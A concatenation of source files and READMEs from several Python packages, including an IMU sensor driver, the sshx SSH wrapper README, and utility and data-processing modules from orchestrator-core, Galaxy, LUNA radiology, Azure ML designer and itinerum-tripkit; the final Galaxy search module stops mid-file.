ICM20600_ICM_SLEEP_MODE, \
ICM20600_ICM_STANDYBY_MODE, \
ICM20600_ICM_ACC_LOW_POWER, \
ICM20600_ICM_ACC_LOW_NOISE, \
ICM20600_ICM_GYRO_LOW_POWER, \
ICM20600_ICM_GYRO_LOW_NOISE, \
ICM20600_ICM_6AXIS_LOW_POWER,\
ICM20600_ICM_6AXIS_LOW_NOISE = 0, 1, 2, 3, 4, 5, 6, 7
__c_module = "akicm"
try:
_ = util.find_library(__c_module)
_akicm = cdll.LoadLibrary(_)
except Exception:
print("Error: module lib{}.so unusable, please install lib{}".
format(__c_module, __c_module))
sys.exit(1)
class ICM20600Cfg(Structure):
_fields_ = [("gyro_range", c_uint16), \
("gyro_rate", c_uint16), \
("gyro_aver", c_uint16), \
("acc_range", c_uint16), \
("acc_rate", c_uint16), \
("acc_aver", c_uint16), \
("power", c_uint16), \
("divider", c_uint16) ]
class GroveIMU9DOFICM20600(object):
def __init__(self, addr = ICM20600_I2C_ADDR1):
self._dev = _akicm.rpi_icm20600_alloc()
dev_path = "/dev/i2c-{}".format(Bus().bus)
icm20600_cfg = ICM20600Cfg(ICM20600_RANGE_2K_DPS,
ICM20600_GYRO_RATE_1K_BW_176,
ICM20600_GYRO_AVERAGE_1,
ICM20600_RANGE_16G,
ICM20600_ACC_RATE_1K_BW_420,
ICM20600_ACC_AVERAGE_4,
ICM20600_ICM_6AXIS_LOW_POWER,
0)
_akicm.rpi_icm20600_init(self._dev,
dev_path,
addr,
byref(icm20600_cfg))
def __del__(self):
_akicm.rpi_icm20600_free(self._dev)
def get_temperature(self):
t = c_double()
_akicm.rpi_icm20600_get_temperature(self._dev, byref(t))
return t.value
def get_accel(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_icm20600_get_accel(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
def get_gyro(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_icm20600_get_gyro(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
temperature = get_temperature
AK09918_I2C_ADDR = 0x0C
AK09918_POWER_DOWN = 0x00
AK09918_NORMAL = 0x01
AK09918_CONTINUOUS_10HZ = 0x02
AK09918_CONTINUOUS_20HZ = 0x04
AK09918_CONTINUOUS_50HZ = 0x06
AK09918_CONTINUOUS_100HZ = 0x08
AK09918_SELF_TEST = 0x10
AK09918_ERR_OK = 0 # OK
AK09918_ERR_DOR = 1 # data skipped
AK09918_ERR_NOT_RDY = 2 # not ready
AK09918_ERR_TIMEOUT = 3 # read/write timeout
AK09918_ERR_SELFTEST_FAILED = 4 # self test failed
AK09918_ERR_OVERFLOW = 5 # sensor overflow, means |x|+|y|+|z| >= 4912uT
AK09918_ERR_WRITE_FAILED = 6 # fail to write
AK09918_ERR_READ_FAILED = 7 # fail to read
class GroveIMU9DOFAK09918(object):
def __init__(self, addr = AK09918_I2C_ADDR):
self._dev = _akicm.rpi_ak09918_alloc()
dev_path = "/dev/i2c-{}".format(Bus().bus)
_akicm.rpi_ak09918_init(self._dev,
dev_path,
addr,
AK09918_NORMAL)
def __del__(self):
_akicm.rpi_ak09918_free(self._dev)
def mode(self, mode = None):
if not mode is None:
_akicm.rpi_ak09918_set_mode(self._dev, mode)
return _akicm.rpi_ak09918_get_mode(self._dev)
def reset(self):
return _akicm.rpi_ak09918_reset(self._dev)
def is_ready(self):
if _akicm.rpi_ak09918_is_ready(self._dev) == AK09918_ERR_OK:
return True
return False
def is_skip(self):
r = _akicm.rpi_ak09918_is_skip(self._dev)
return (r == AK09918_ERR_DOR)
def get_magnet(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_ak09918_read(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
def get_magnet_raw(self):
x, y, z = c_double(), c_double(), c_double()
_akicm.rpi_ak09918_read_raw(self._dev,
byref(x), byref(y), byref(z))
return x.value, y.value, z.value
def err_string(self, errval):
return _akicm.rpi_ak09918_err_string(errval)
Grove = GroveIMU9DOFICM20600
def main():
import time
print(\
""" Make sure Grove-IMU-9DOF-ICM20600-AK09918
inserted in one I2C slot of Grove-Base-Hat
""")
icm = GroveIMU9DOFICM20600()
ak = GroveIMU9DOFAK09918()
ak.mode(AK09918_CONTINUOUS_100HZ)
while True:
print("Temperature: {:.2f} C".format(icm.get_temperature()))
x, y, z = icm.get_accel()
print(" AX = %7.2f mg AY = %7.2f mg AZ = %7.2f mg" % (x, y, z))
x, y, z = icm.get_gyro()
print(" GX = %7.2f dps GY = %7.2f dps GZ = %7.2f dps" % (x, y, z))
if ak.is_ready():
# if ak.is_skip():
# print("*** call get_magnet() too slowly, data droped by AK09918")
x, y, z = ak.get_magnet()
print(" MX = %7.2f uT MY = %7.2f uT MZ = %7.2f uT" % (x, y, z))
time.sleep(1.0)
if __name__ == '__main__':
main() | PypiClean |
/sshx-0.33.5.tar.gz/sshx-0.33.5/README.md | # sshx (SSH eXtensions)
[](https://www.travis-ci.com/github/WqyJh/sshx)
[](https://codecov.io/gh/WqyJh/sshx)
[](https://raw.githubusercontent.com/WqyJh/sshx/master/LICENSE)
[](https://sshx.readthedocs.io/en/latest/)
sshx is a lightweight wrapper for ssh/scp command, which has the following features:
- Remember your ssh accounts safely.
- Connect to your account without typing password.
- Set jump hosts for your connection.
- Create ssh port forwardings without typing password.
- Create socks5 proxy by ssh dynamic port forwarding.
- Enable jump hosts for your port forwardings.
- Copy files from/to your account without typing password.
- Enable jump hosts for your scp connection.
- Execute remote command without typing password.
- Enable jump hosts for executing command.
- Install ssh public keys to remote server.
- Enable jump hosts for public key installation.
Read full documentation on [ReadTheDocs](https://sshx.readthedocs.io/en/latest/).
## Installation
```bash
pip install sshx
```
### Supported platform
- Linux
- macOS
- WSL/cygwin/msys2 on Windows
**Attention:**
- Native Windows support was removed.
- Python 2 support was removed.
### Requirements
- Python >= 3.6
- openssh-clients: `ssh`, `scp`, `ssh-keygen`
## Quick Start
1. Initialization.
Perform only once after you've installed sshx.
```bash
sshx init
```
2. Adding an account.
```bash
sshx add myhost -l test@192.168.9.155
```
(This command will ask you to type your password and sshx would store the encrypted password.)
3. Connect to the account.
```bash
sshx connect myhost
```
| PypiClean |
/orchestrator_core-1.2.3rc3.tar.gz/orchestrator_core-1.2.3rc3/orchestrator/utils/functional.py |
import itertools
from typing import Callable, Iterable, List, Optional, Sequence, Set, TypeVar, Union
import more_itertools
import structlog
logger = structlog.get_logger(__name__)
def first_available_or_next(values: Iterable[int], start: int = 0) -> int:
"""Return first available value or the next logical value.
>>> first_available_or_next([0, 1, 3])
2
>>> first_available_or_next([0, 1, 2, 3])
4
>>> first_available_or_next([1, 2, 3])
0
>>> first_available_or_next([])
0
>>> first_available_or_next([0, 1, 3], start=11)
11
>>> first_available_or_next([0, 1, 3], start=4)
4
>>> first_available_or_next([], 22)
22
>>> first_available_or_next([1, 100, 101], 33)
33
>>> first_available_or_next([11, 22, 33, 44, 55], 33)
34
Args:
values: an iterable of integer values.
start: set starting value.
Returns:
First available value or next logical one.
"""
# +2 -> One +1 to get as many consecutive values up to and including the max+1 value. Another +1 for one extra because range is exclusive.
stop = max(values, default=0) + 2
if start >= stop:
stop = start + 1
return min(set(range(start, stop)) - set(values))
def orig(func: Callable) -> Callable:
"""Return the function wrapped by one or more decorators.
Args:
func: step function
Returns:
Undecorated step function for testing purposes.
"""
f = func
while hasattr(f, "__wrapped__"):
f = f.__wrapped__
return f
def join_cs(*args: Union[Iterable[str], str]) -> str:
"""Return comma separated string from one or more comma separated strings or iterables of strings.
It deals with empty strings and properly inserting comma's.
See: `test_join_cs` for examples.
Args:
args: One or more comma separated strings or iterables that should be joined.
Returns:
A comma separated string.
"""
def to_iterable(value: Union[Iterable[str], str]) -> Iterable[str]:
if isinstance(value, str):
return filter(None, value.split(","))
return value
return ",".join(itertools.chain(*map(to_iterable, args)))
def expand_ranges(ranges: Sequence[Sequence[int]], inclusive: bool = False) -> List[int]:
"""Expand sequence of range definitions into sorted and deduplicated list of individual values.
A range definition is either a:
* one element sequence -> an individual value.
* two element sequence -> a range of values (either inclusive or exclusive).
>>> expand_ranges([[1], [2], [10, 12]])
[1, 2, 10, 11]
>>> expand_ranges([[1], [2], [10, 12]], inclusive=True)
[1, 2, 10, 11, 12]
>>> expand_ranges([[]])
Traceback (most recent call last):
...
ValueError: Expected 1 or 2 element list for range definition. Got f0 element list instead.
Resulting list is sorted::
>>> expand_ranges([[100], [1, 4]], inclusive=True)
[1, 2, 3, 4, 100]
Args:
ranges: sequence of range definitions
inclusive: are the stop values of the range definition inclusive or exclusive.
Returns:
Sorted deduplicated list of individual values.
Raises:
ValueError: if range definition is not a one or two element sequence.
"""
values: Set[int] = set()
for r in ranges:
if len(r) == 2:
values.update(range(r[0], r[1] + (1 if inclusive else 0)))
elif len(r) == 1:
values.add(r[0])
else:
raise ValueError(f"Expected 1 or 2 element list for range definition. Got f{len(r)} element list instead.")
return sorted(values)
T = TypeVar("T")
def as_t(value: Optional[T]) -> T:
"""Cast `value` to non-Optional.
One often needs to assign a value that was typed as being `Optional` to a variable that is typed non-Optional. MyPy
rightfully takes issue with these assignments (strict Optional checking is default since MyPy 0.600) unless we
have explicitely determined these values to be not `None`. The most succinct way to do that is using an `assert`
statement::
x: Optional[int] = 7
assert x is not None
y: int = x
However that gets tedious pretty fast. One might be inclined to turn off strict Optional checking. However that
would be a bad decision; None values will percolate through data structures and cause issue at locations far from
where they originally came from. A better solution would be to fail right where the issue occurred but using a
somewhat more convenient syntax.
Some languages such as Kotlin provide the `as` operator:
.. code-block:: kotlin
val x: Int? = 7 // ? declaring the Int to be nullable
val y: Int = x as Int
That is the inspiration for this function. `t` referring to the type being wrapped in an `Optional`. Hence `as_t`
meaning `as the non-Optional type`.
The above Python example now becomes::
x: Optional[int] = 7
y: int = as_t(x)
`as_t` checks whether te value passed to it is not `None`, satisfying MyPy. If it happens to be `None` it raises a
`ValueError`, satisfying our requirement to fail at the location where we require the value to be not None and not
somewhere far down the code path.
Args:
value: `Optional` value to be casted to non-Optional
Returns:
non-Optional value.
Raises:
ValueError: in case `value` is `None`
"""
if value is None:
raise ValueError("Trying to cast a value to non-Optional type failed due to value being None.")
return value
def ireplace(iterable: Iterable[T], old: T, new: T) -> Iterable[T]:
"""Replace one or more occurrences of a specific value in an iterable with another value.
The 'i' prefix indicates 'iterable' and is there to distinguish it from other similar functions.
>>> list(ireplace(["1-10", "", "22"], "", "0"))
['1-10', '0', '22']
Args:
iterable: The iterable that needs to have a specific value replaced for all its occurrences.
old: The value in the iterable to replace.
new: The value to replace `old` with.
Returns:
A new iterable with `old` values replaced by `new` values
"""
yield from more_itertools.replace(iterable, lambda v: v == old, [new])
def to_ranges(i: Iterable[int]) -> Iterable[range]:
"""Convert a sorted iterable of ints to an iterable of range objects.
IMPORTANT: the iterable passed in should be sorted and not contain duplicate elements.
Examples::
>>> list(to_ranges([2, 3, 4, 5, 7, 8, 9, 45, 46, 47, 49, 51, 53, 54, 55, 56, 57, 58, 59, 60, 61]))
[range(2, 6), range(7, 10), range(45, 48), range(49, 50), range(51, 52), range(53, 62)]
Args:
i: sorted iterable
Yields:
range object for each consecutive set of integers
"""
# The trick here is the key function (the lambda one) that calculates the difference between an element of the
# iterable `i` and its corresponding enumeration value. For consecutive values in the iterable, this difference
# will be the same! All these values (those with the same difference) are grouped by the `groupby` function. We
# return the first and last element to construct a `range` object
for _, g in itertools.groupby(enumerate(i), lambda t: t[1] - t[0]):
group = list(g)
yield range(group[0][1], group[-1][1] + 1) | PypiClean |
/galaxy-lib-19.5.2.tar.gz/galaxy-lib-19.5.2/galaxy/tools/cwl/schema.py | import os
from collections import namedtuple
from six.moves.urllib.parse import urldefrag
from .cwltool_deps import (
ensure_cwltool_available,
load_tool,
LoadingContext,
schema_salad,
workflow,
)
RawProcessReference = namedtuple("RawProcessReference", ["process_object", "uri"])
ProcessDefinition = namedtuple("ProcessDefinition", ["process_object", "metadata", "document_loader", "avsc_names", "raw_process_reference"])
class SchemaLoader(object):
def __init__(self, strict=True):
self._strict = strict
self._raw_document_loader = None
@property
def raw_document_loader(self):
ensure_cwltool_available()
from cwltool.load_tool import jobloaderctx
return schema_salad.ref_resolver.Loader(jobloaderctx)
def raw_process_reference(self, path):
uri = "file://" + os.path.abspath(path)
fileuri, _ = urldefrag(uri)
return RawProcessReference(self.raw_document_loader.fetch(fileuri), uri)
def raw_process_reference_for_object(self, object, uri=None):
if uri is None:
uri = "galaxy://"
return RawProcessReference(object, uri)
def process_definition(self, raw_reference):
document_loader, avsc_names, process_object, metadata, uri = load_tool.validate_document(
self.raw_document_loader,
raw_reference.process_object,
raw_reference.uri,
)
process_def = ProcessDefinition(
process_object,
metadata,
document_loader,
avsc_names,
raw_reference,
)
return process_def
def tool(self, **kwds):
# cwl.workflow.defaultMakeTool() method was renamed to default_make_tool() in
# https://github.com/common-workflow-language/cwltool/commit/886a6ac41c685f20d39e352f9c657e59f3312265
try:
default_make_tool = workflow.default_make_tool
except AttributeError:
default_make_tool = workflow.defaultMakeTool
process_definition = kwds.get("process_definition", None)
if process_definition is None:
raw_process_reference = kwds.get("raw_process_reference", None)
if raw_process_reference is None:
raw_process_reference = self.raw_process_reference(kwds["path"])
process_definition = self.process_definition(raw_process_reference)
args = {"strict": self._strict}
make_tool = kwds.get("make_tool", default_make_tool)
if LoadingContext is not None:
args["construct_tool_object"] = make_tool
loading_context = LoadingContext(args)
tool = load_tool.make_tool(
process_definition.document_loader,
process_definition.avsc_names,
process_definition.metadata,
process_definition.raw_process_reference.uri,
loading_context,
)
else:
tool = load_tool.make_tool(
process_definition.document_loader,
process_definition.avsc_names,
process_definition.metadata,
process_definition.raw_process_reference.uri,
make_tool,
args
)
return tool
schema_loader = SchemaLoader()
non_strict_schema_loader = SchemaLoader(strict=False) | PypiClean |
/pyluna-radiology-0.3.3.tar.gz/pyluna-radiology-0.3.3/luna/radiology/refined_table/generate.py | import glob, shutil, os, uuid, subprocess, sys, argparse, time
import click
from checksumdir import dirhash
from luna.common.CodeTimer import CodeTimer
from luna.common.config import ConfigSet
from luna.common.sparksession import SparkConfig
from luna.common.custom_logger import init_logger
import luna.common.constants as const
from pyspark.sql import functions as F
from pyspark.sql.types import ArrayType,StringType,StructType,StructField
logger = init_logger()
logger.info("Starting process_scan_job.py")
APP_CFG='APP_CFG'
def validate_file_ext(ctx, param, value):
if not value in ['mhd','nrrd']:
raise click.UsageError("file_ext should be one of mhd|nrrd")
else:
return value.lower()
@click.command()
@click.option('-d', '--hdfs_uri', default='file:///', help='hdfs URI uri e.g. hdfs://localhost:8020', required=True)
@click.option('-c', '--custom_preprocessing_script', help="Path to python file to execute in the working directory", required=True)
@click.option('-t', '--tag', default = 'default', help="Provencence tag")
@click.option('-f', '--config_file', default = 'config.yaml', help="config file")
@click.option('-i', '--uid', help = "SeriesInstanceUID")
@click.option('-p', '--project_name', help="MIND project address")
@click.option('-e', '--file_ext', callback=validate_file_ext, help="file format for scan generation", required=True)
def cli(uid, hdfs_uri, custom_preprocessing_script, tag, config_file, project_name, file_ext):
"""
This module takes a SeriesInstanceUID, calls a script to generate volumetric images, and updates the scan table.
This module is to be run from the top-level data-processing directory using the -m flag as follows:
Example:
$ python3 -m luna.radiology.refined_table.generate \
--hdfs_uri file:// \
--custom_preprocessing_script luna/radiology/refined_table/dicom_to_scan.py \
--uid 1.2.840.113619...... \
--project_name OV_16-.... \
--file_ext mhd \
--config_file config.yaml
"""
start_time = time.time()
ConfigSet(name=APP_CFG, config_file=config_file)
spark = SparkConfig().spark_session(config_name=APP_CFG, app_name='dicom-to-scan')
generate_scan_table(spark, uid, hdfs_uri, custom_preprocessing_script, tag, project_name, file_ext)
logger.info("--- Finished in %s seconds ---" % (time.time() - start_time))
def generate_scan_table(spark, uid, hdfs_uri, custom_preprocessing_script, tag, project_name, file_ext):
# Get environment variables
hdfs_db_root = os.environ["MIND_ROOT_DIR"]
bin_python = os.environ["PYSPARK_PYTHON"]
concept_id_type = "SeriesInstanceUID"
project_dir = os.path.join(hdfs_db_root, project_name)
output_dir = os.path.join(project_dir, const.SCANS)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
try:
df_dcmdata = spark.read.format("delta").load( hdfs_uri + os.path.join(project_dir, const.DICOM_TABLE))
except Exception as ex:
logger.error("Problem loading dicom table at " + hdfs_uri + os.path.join(project_dir, const.DICOM_TABLE))
logger.error(ex)
exit(1)
logger.info (" >>> Loaded dicom table")
def python_def_generate_scan(project_dir, file_ext, path):
'''
Accepts project path, file type to generate, and dicom path, and generates a volumetric MHD filename
Args:
project_dir: project location
file_ext: mhd or nrrd
path: path to the dicoms in interest
Returns:
scan_meta: array of (scan_record_uuid, filepath, filetype)
'''
scan_meta = []
job_uuid = "job-" + str(uuid.uuid4())
print ("Starting " + job_uuid)
input_dir, filename = os.path.split(path)
input_dir = input_dir[input_dir.index("/"):]
# Execute some modularized python script
print ([bin_python, custom_preprocessing_script, project_dir, input_dir, file_ext])
proc = subprocess.Popen([bin_python, custom_preprocessing_script, project_dir, input_dir, file_ext], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = proc.communicate()
print (f"{job_uuid} - Output from script: {out}")
if proc.returncode != 0:
print (f"{job_uuid} - Errors from script: {err}")
return scan_meta
scan_record_uuid = "-".join(["SCAN", tag, dirhash(input_dir, "sha256")])
filepath = out.decode('utf-8').split('\n')[-1]
if file_ext == 'mhd':
scan_meta = [(scan_record_uuid, filepath+'.mhd', 'mhd'), (scan_record_uuid, filepath+'.zraw', 'zraw')]
elif file_ext == 'nrrd':
scan_meta = [(scan_record_uuid, filepath+'.nrrd', 'nrrd')]
print(scan_meta)
return scan_meta
# Make our UDF
schema = ArrayType(
StructType([
StructField('scan_record_uuid', StringType(), False),
StructField('filepath', StringType(), False),
StructField('filetype', StringType(), False)
]),
)
spark.sparkContext.addPyFile(custom_preprocessing_script)
udf_generate_scan = F.udf(python_def_generate_scan, schema)
# Filter dicom table with the given SeriesInstanceUID and return 1 row. (Assumption: Dicom folders are organized by SeriesInstanceUID)
df = df_dcmdata \
.filter(F.col("metadata."+concept_id_type)==uid) \
.limit(1)
if df.count()==0:
logger.error("No matching scan for SeriesInstanceUID = " + uid)
exit(1)
# Run jobs
with CodeTimer(logger, 'Generate scans:'):
df_scan = df.withColumn("scan_data", udf_generate_scan(F.lit(project_dir), F.lit(file_ext), df.path))
# expand the array and flatten the schema
df_scan = df_scan.withColumn("exp", F.explode("scan_data"))
df_scan = df_scan.select("metadata.SeriesInstanceUID", "exp.*")
# Check if the same scan_record_uuid/filetype combo exists. if not, append to scan table.
scan_table_path = os.path.join(project_dir, const.SCAN_TABLE)
if os.path.exists(scan_table_path):
df_existing_scan = spark.read.format("delta").load(scan_table_path)
intersection = df_existing_scan.join(F.broadcast(df_scan), ["scan_record_uuid", "filetype"])
if intersection.count() == 0:
df_scan.write.format("delta") \
.mode("append") \
.save(scan_table_path)
else:
df_scan.write.format("delta") \
.mode("append") \
.save(scan_table_path)
# Validation step
df_scan.show(200, truncate=False)
if __name__ == "__main__":
cli() | PypiClean |
/azureml_designer_core-0.0.77-py3-none-any.whl/azureml/designer/core/model/constants.py |
class ModelSpecConstants:
# Top level keys in model_spec
FLAVOR_KEY = "flavor"
FLAVOR_EXTRAS_KEY = "flavor_extras"
MODEL_FILE_KEY = "model_file"
CONDA_FILE_KEY = "conda_file"
LOCAL_DEPENDENCIES_KEY = "local_dependencies"
INPUTS_KEY = "inputs"
OUTPUTS_KEY = "outputs"
SERVING_CONFIG_KEY = "serving_config"
DESCRIPTION_KEY = "description"
TIME_CREATED_KEY = "time_created"
# Flavor specified keys in model_spec
FLAVOR_NAME_KEY = "name"
SERIALIZATION_METHOD_KEY = "serialization_method"
MODEL_CLASS_KEY = "class"
MODEL_MODULE_KEY = "module"
IS_CUDA_KEY = "is_cuda"
INIT_PARAMS_KEY = "init_params"
# Machine learning task specified keys in model_spec
TASK_TYPE_KEY = "task_type"
LABEL_MAP_FILE_KEY = "label_map_file"
# Serving Config
GPU_SUPPORT_KEY = "gpu_support"
CPU_CORE_NUM_KEY = "cpu_core_num"
MEMORY_IN_GB_KEY = "memory_in_GB"
# Others
DEFAULT_ARTIFACT_SAVE_PATH = "./AzureMLModel"
CONDA_FILE_NAME = "conda.yaml"
CONDA_ENV_NAME = "project_environment"
MODEL_SPEC_FILE_NAME = "model_spec.yaml"
LOCAL_DEPENDENCIES_PATH = "local_dependencies"
LOCAL_DEPENDENCIES_ZIP_FILE_NAME = f"{LOCAL_DEPENDENCIES_PATH}.zip"
CUSTOM_MODEL_FLAVOR_NAME = "custom"
CUSTOM_MODEL_DIRECTORY = "model"
PICKLE_MODEL_FILE_NAME = "model.pkl"
PYTORCH_STATE_DICT_FILE_NAME = "state_dict.pt"
LABEL_MAP_FILE_NAME = "index_to_label.csv"
LOCAL_DEPENDENCIES_PY_FILES_PATH = "pyfiles"
# Model Inputs
MODEL_INPUT_NAME_KEY = "name"
MODEL_INPUT_VALUE_TYPE_KEY = "value_type"
MODEL_INPUT_DEFAULT_KEY = "default"
MODEL_INPUT_DESCRIPTION_KEY = "description"
MODEL_INPUT_OPTIONAL_KEY = "optional"
MODEL_INPUT_PRE_PROCESSOR_KEY = "pre_processor"
# PreProcessor
PRE_PROCESSOR_MODULE_KEY = "module"
PRE_PROCESSOR_CLASS_KEY = "class"
PRE_PROCESSOR_INIT_PARAMS_KEY = "init_params"
class ScoreColumnConstants:
# Label and Task Type Region
BinaryClassScoredLabelType = "Binary Class Assigned Labels"
MultiClassScoredLabelType = "Multi Class Assigned Labels"
RegressionScoredLabelType = "Regression Assigned Labels"
ClusterScoredLabelType = "Cluster Assigned Labels"
ScoredLabelsColumnName = "Scored Labels"
ClusterAssignmentsColumnName = "Assignments"
# Probability Region
CalibratedScoreType = "Calibrated Score"
ScoredProbabilitiesColumnName = "Scored Probabilities"
ScoredProbabilitiesMulticlassColumnNamePattern = "Scored Probabilities"
# Distance Region
ClusterDistanceMetricsColumnNamePattern = "DistancesToClusterCenter no."
# PytorchTensor Region
TensorScoredLabelColumnName = "Tensor Output"
# Temporary Column Names for Intermediate Results
ScoredLabelIdsColumnName = "Scored Label Ids"
ScoredProbabilitiesMulticlassColumnName = "Scored Probabilities List"
# Others
# For test env where package is installed from DevOps feed
DEV_OPS_EXTRA_INDEX_URL_PREFIX = "--extra-index-url=https://azureml-modules"
DESIGNER_PIP_PACKAGE_PREFIX = "azureml-designer-" | PypiClean |
/itinerum-tripkit-0.0.26.tar.gz/itinerum-tripkit-0.0.26/README.md | # itinerum-tripkit
Documentation for library usage: https://itinerum-tripkit.readthedocs.io/
This library serves as a framework to process data from the Itinerum platform and hardware GPS loggers (e.g., QStarz). It can be used both through as a library in Jupyter to explore datasets interactively or imported as a module in standalone scripts and applications.
This repository also serves as the development bed for the Itinerum platform algorithms within the TRIP Lab repositories.
Looking to get started without coding? Try the [itinerum-tripkit-cli](https://github.com/TRIP-Lab/itinerum-tripkit-cli)!
## Setup
### Quickstart
1. Install this library from PyPI (a Python [virtual environment](https://docs.python.org/3/library/venv.html) is recommended)
2. Create a configuration file with input filepaths, output filepaths, and trip processing parameters. See the included `tripkit_config.py` file for a full example.
3. Import `tripkit` as a dependency in a notebook or script
For more complete installation information, see the official [itinerum-tripkit documentation](https://itinerum-tripkit.readthedocs.io/en/stable/usage/installation.html).
### Loading Subway Stations
Subway station data for trip detection can be loaded similarly for all processing modules. Place a _.csv_ file of station entrances with the columns of `x` (or `longitude`) and `y` (or `latitude`). Locations are expected as geographic coordinates only. Edit the `SUBWAY_STATIONS_FP` config parameter to reflect the subway stations _.csv_ filepath.
#### Example
_View attributes on a User_
```python
import tripkit_config
itinerum = Itinerum(tripkit_config)
# create a new database and read in .csv data
itinerum.setup()
# load all users from database
users = itinerum.load_all_users()
test_user = users[0]
print(test_user.coordinates)
print(test_user.prompt_responses)
```
_Run trip detection on a User_
```python
import tripkit_config
itinerum = Itinerum(tripkit_config)
# load user from database by uuid
user = itinerum.database.load_user('00000000-0000-0000-0000-000000000000')
# run a provided trip detection algorithm
parameters = {
'subway_entrances': itinerum.database.load_subway_entrances(),
'break_interval_seconds': tripkit_config.TRIP_DETECTION_BREAK_INTERVAL_SECONDS,
'subway_buffer_meters': tripkit_config.TRIP_DETECTION_SUBWAY_BUFFER_METERS,
'cold_start_distance': tripkit_config.TRIP_DETECTION_COLD_START_DISTANCE_METERS,
'accuracy_cutoff_meters': tripkit_config.TRIP_DETECTION_ACCURACY_CUTOFF_METERS
}
trips = itinerum.process.trip_detection.triplab.v2.algorithm.run(user.coordinates, parameters)
```
## Processing
#### Trip Detection
| Arguments | |
| ----------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| `parameters` | A dictionary to supply arbitrary kwargs to an algorithm |
| `subway_stations` | A list of subway station entrance database objects containing `latitude` and `longitude` attributes |
| `coordinates` | A timestamp-ordered list of coordinates as dicts for a specific user. Multiple users should be run in sequence and have their output coordinates concatenated into a single list after if desired. |
#### Trip Outputs
Trips will be output with the following trip codes to indicate the type of trip:
| Trip Code | Description |
| --------- | ----------------------------------- |
| 1 | Complete trip |
| 2 | Complete trip - subway |
| 101 | Missing trip |
| 102 | Missing trip - subway |
| 103 | Missing trip - less than 250m |
| 201 | Single point |
| 202 | Distance too short - less than 250m |
## Outputs
The aim of this library is to provide easy visualization of Itinerum data to assist in writing trip processing algorthms. Therefore at a minimum, the library provides exporting processed coordinates and traces as .geojson files (TBA: GeoPackage format). With a PostgreSQL backend for caching, PostGIS can be enabled (unimplemented) and a `geom` column generated for directly connection QGIS to the output data. The library should also easily provide methods for easily plotting GPS within Jupyter notebooks.
| PypiClean |
/galaxy_data-23.0.5-py3-none-any.whl/galaxy/model/search.py | import logging
import re
from json import dumps
from typing import Dict
import parsley
from sqlalchemy import and_
from sqlalchemy.orm import aliased
from galaxy.model import (
ExtendedMetadata,
ExtendedMetadataIndex,
History,
HistoryAnnotationAssociation,
HistoryDatasetAssociation,
HistoryDatasetAssociationTagAssociation,
HistoryTagAssociation,
Job,
JobParameter,
JobToInputDatasetAssociation,
JobToInputLibraryDatasetAssociation,
JobToOutputDatasetAssociation,
Library,
LibraryDataset,
LibraryDatasetDatasetAssociation,
LibraryFolder,
Page,
PageRevision,
StoredWorkflow,
StoredWorkflowTagAssociation,
)
from galaxy.model.tool_shed_install import ToolVersion
log = logging.getLogger(__name__)
class ViewField:
"""
A ViewField defines a field in a view that filter operations can be applied to
These filter operations are either handled with standard sqlalchemy filter calls,
or passed to specialized handlers (such as when a table join would be needed to
do the filtering)
Parameters:
sqlalchemy_field - Simple filtering using existing table columns, the argument is an sqlalchemy column
that the right hand value will be compared against
handler - Requires more specialized code to do filtering, usually requires a table join in order to
process the conditional
post_filter - Unable to do simple sqlalchemy based table filtering, filter is applied to loaded object
Thus methods avalible to the object can be used for filtering. example: a library folder must climb
its chain of parents to find out which library it belongs to
"""
def __init__(self, name, sqlalchemy_field=None, handler=None, post_filter=None, id_decode=False):
self.name = name
self.sqlalchemy_field = sqlalchemy_field
self.handler = handler
self.post_filter = post_filter
self.id_decode = id_decode
class ViewQueryBaseClass:
FIELDS: Dict[str, ViewField] = {}
VIEW_NAME = "undefined"
def __init__(self):
self.query = None
self.do_query = False
self.state = {}
self.post_filter = []
def decode_query_ids(self, trans, conditional):
if conditional.operator == "and":
self.decode_query_ids(trans, conditional.left)
self.decode_query_ids(trans, conditional.right)
else:
left_base = conditional.left.split(".")[0]
if left_base in self.FIELDS:
field = self.FIELDS[left_base]
if field.id_decode:
conditional.right = trans.security.decode_id(conditional.right)
def filter(self, left, operator, right):
if operator == "and":
self.filter(left.left, left.operator, left.right)
self.filter(right.left, right.operator, right.right)
else:
left_base = left.split(".")[0]
if left_base in self.FIELDS:
self.do_query = True
field = self.FIELDS[left_base]
if field.sqlalchemy_field is not None:
clazz, attribute = field.sqlalchemy_field
sqlalchemy_field_value = getattr(clazz, attribute)
if operator == "=":
self.query = self.query.filter(sqlalchemy_field_value == right)
elif operator == "!=":
self.query = self.query.filter(sqlalchemy_field_value != right)
elif operator == "like":
self.query = self.query.filter(sqlalchemy_field_value.like(right))
else:
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
elif field.handler is not None:
field.handler(self, left, operator, right)
elif field.post_filter is not None:
self.post_filter.append([field.post_filter, left, operator, right])
else:
raise GalaxyParseError(f"Unable to filter on field: {left}")
else:
raise GalaxyParseError(f"Unknown field: {left}")
def search(self, trans):
raise GalaxyParseError(f"Unable to search view: {self.VIEW_NAME}")
def get_results(self, force_query=False):
if self.query is not None and (force_query or self.do_query):
for row in self.query.distinct().all():
selected = True
for f in self.post_filter:
if not f[0](row, f[1], f[2], f[3]):
selected = False
if selected:
yield row
##################
# Library Dataset Searching
##################
def library_extended_metadata_filter(view, left, operator, right):
view.do_query = True
if "extended_metadata_joined" not in view.state:
view.query = view.query.join(ExtendedMetadata)
view.state["extended_metadata_joined"] = True
alias = aliased(ExtendedMetadataIndex)
field = f"/{'/'.join(left.split('.')[1:])}"
view.query = view.query.filter(
and_(ExtendedMetadata.id == alias.extended_metadata_id, alias.path == field, alias.value == str(right))
)
def ldda_parent_library_filter(item, left, operator, right):
if operator == "=":
return right == item.library_dataset.folder.parent_library.id
elif operator == "!=":
return right != item.library_dataset.folder.parent_library.id
raise GalaxyParseError(f"Invalid comparison operator: {operator}")
class LibraryDatasetDatasetView(ViewQueryBaseClass):
VIEW_NAME = "library_dataset_dataset"
FIELDS = {
"extended_metadata": ViewField("extended_metadata", handler=library_extended_metadata_filter),
